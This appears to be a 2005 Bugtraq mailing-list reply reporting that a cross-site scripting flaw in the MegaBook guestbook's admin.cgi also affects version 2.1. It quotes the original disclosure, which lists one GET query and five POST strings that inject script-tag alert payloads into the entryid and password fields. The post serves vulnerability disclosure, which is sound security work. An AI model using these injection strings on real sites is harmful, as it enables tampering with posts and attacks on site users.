<<< Date Index >>>     <<< Thread Index >>>

Re: MegaBook V2.0 - Cross Site Scripting Exploit



In-Reply-To: <20050505104551.23441.qmail@xxxxxxxxxxxxxxxxxxxxx>

The same vulnerability also exist in the new version of MegaBook V2.1

>Received: (qmail 6270 invoked from network); 5 May 2005 17:31:03 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) 
>(205.206.231.27)
>  by mail.securityfocus.com with SMTP; 5 May 2005 17:31:03 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com 
>[205.206.231.20])
>       by outgoing3.securityfocus.com (Postfix) with QMQP
>       id 8A54C237664; Thu,  5 May 2005 09:22:24 -0600 (MDT)
>Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx>
>List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx>
>List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx>
>Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx
>Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx
>Received: (qmail 20731 invoked from network); 5 May 2005 03:18:37 -0000
>Date: 5 May 2005 10:45:51 -0000
>Message-ID: <20050505104551.23441.qmail@xxxxxxxxxxxxxxxxxxxxx>
>Content-Type: text/plain
>Content-Disposition: inline
>Content-Transfer-Encoding: binary
>MIME-Version: 1.0
>X-Mailer: MIME-tools 5.411 (Entity 5.404)
>From: Spy Hat <spyhat@xxxxxxxxxx>
>To: bugtraq@xxxxxxxxxxxxxxxxx
>Subject: MegaBook V2.0 - Cross Site Scripting Exploit
>
>
>
>The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross 
>Site Scripting, which will allow the attacker to modify the post in the 
>guestbook. The affected scripts is admin.cgi 
>
>URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi) 
>
>I have tested the script with the following query:
>
>?action=modifypost&entryid=">&lt;script&gt;alert('wvs-xss-magic-string-703410097');&lt;/script&gt;
>
>I have also tested the script with theses POST variables:
>
>action=modifypost&entryid=66&password=&lt;script&gt;alert('wvs-xss-magic-string-188784308');&lt;/script&gt;
>
>action=modifypost&entryid=66&password='>&lt;script&gt;alert('wvs-xss-magic-string-486624156');&lt;/script&gt;
>
>action=modifypost&entryid=66&password=">&lt;script&gt;alert('wvs-xss-magic-string-1852691616');&lt;/script&gt;
>
>action=modifypost&entryid=66&password=>&lt;script&gt;alert('wvs-xss-magic-string-429380114');&lt;/script&gt;
>
>action=modifypost&entryid=66&password=</textarea>&lt;script&gt;alert('wvs-xss-magic-string-723975367');&lt;/script&gt;
>
>
>Yours,
>SpyHat
>